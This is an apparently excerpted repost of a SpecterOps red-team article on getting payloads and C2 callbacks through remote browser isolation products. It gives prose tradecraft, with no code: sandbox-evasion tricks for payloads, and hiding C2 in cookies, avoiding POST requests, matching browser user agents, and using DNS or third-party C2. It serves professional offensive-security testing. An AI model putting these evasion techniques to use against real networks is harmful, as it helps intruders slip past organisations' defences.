Following a brief introduction to the technology, we share our firsthand experiences when encountering RBI solutions and techniques the SpecterOps team have employed for establishing command and control to systems that proxy traffic through RBI products broken down into three segments: Payload Ingress, C2 Egress, and RBI Bypass.
There are three types of browser isolation in use today: client-side browser isolation, on-premises browser isolation, and RBI. As these names imply, client-side virtualizes the browsing on the local host, on-premises runs within the organization, and RBI virtualizes the web sessions in the cloud.
One of the primary concerns you should have as an offensive professional is the profound impact RBI will likely have on your C2 traffic.
They may offer a link where a user can do that, but an organization usually has a proxy setup that sends ALL web traffic through RBI. This means your stealthy HTTPS C2 traffic gets sent through the same virtualized host process the same as everything else and results in the server responses to your agents being rendered as an inert stream.
As you can probably imagine, trying to figure out why your C2 traffic is not returning when an organization uses RBI can be very frustrating.
When delivering payloads to clients through RBI solutions, these solutions' sandboxing and scanning capabilities present significant hurdles that must be overcome to achieve code execution in your target environment.
Utilizing standard techniques such as prime factorization, thread sleep checks, executing environment checks/guardrails like enumerating processors in a system, string obfuscation, string building, non-terminating conditional-based loops, and logic structures relying on user input will help you get through the RBI scanning process.
Some may only allow a user to view the file contents in the browser or allow the user to download a sanitized version of the file in which the product removes macros, JavaScript, or any other content the vendor deems may be suspicious; leaving the user with an inert download. Other RBI solutions are set to a fail-closed state that blocks the download of a file if it cannot scan it.
We then check out Cloudflare logs and confirm that the RBI is isolating our C2 traffic.
Like the ingress section, while some talking points may not be new, we will cover them to better explain how RBI products affect C2 traffic when deployed in a target environment.
Based on our experience with RBI, our first recommendation when crafting C2 traffic intended to egress an RBI solution with HTTP traffic is to omit any POST requests.
The type of header you use can change how the RBI solution responds to your C2 traffic and may allow you to get out without much trouble.
Not all RBI solutions will block this, but many will block web traffic with user agents that do not match approved web browsers or do not meet a minimum sufficient version of a browser.
Passing the C2 traffic in a cookie is not a new way of doing business, but it can be a great technique to get through RBI. Some RBI solutions virtualize and stream the web page content but transparently pass the cookie header to the other end of the channel for usability since many sites require cookie functionality.
As with any C2 channel, your redirector setup will significantly impact how RBI solutions react to your traffic.
Ensure you have valid TLS certificates, as RBI products often block unencrypted HTTP traffic.
This can be accomplished in a couple of different ways depending on the capabilities and configuration of the RBI implementation using either DNS C2 or Third-Party C2. DNS C2. Many RBI solutions only monitor HTTP/HTTPS traffic by default and either require explicitly configuring DNS monitoring or lack that capability altogether.
Third-Party C2. When establishing new HTTP/S communication channels through RBI solutions, new domains and IP connections will be subject to inspection for any new traffic.
Lastly, you should try to move to a GET-POST HTTP C2 channel if the RBI will let them through.
Calling Home, Get Your Callbacks Through RBI was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.
This Cyber News was published on securityboulevard.com. Publication date: Thu, 18 Jan 2024 00:13:09 +0000